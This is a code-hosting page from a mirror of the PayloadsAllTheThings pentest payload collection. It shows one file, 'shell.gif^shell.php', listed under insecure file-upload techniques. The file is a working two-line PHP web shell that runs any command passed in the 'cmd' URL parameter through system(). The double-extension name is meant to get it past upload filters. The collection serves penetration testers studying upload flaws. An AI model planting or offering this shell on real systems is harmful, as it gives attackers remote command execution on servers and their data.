This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2024-12-18 18:36:10 +00:00
Code
Issues
Actions
Packages
Projects
Releases
Wiki
Activity
9a908a15d2
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.gif^shell.php
nismo-s13
b1ce7a2547
Rename shell.gif?shell.php to shell.gif^shell.php
2021-11-24 17:55:13 +13:00
2 lines
44 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink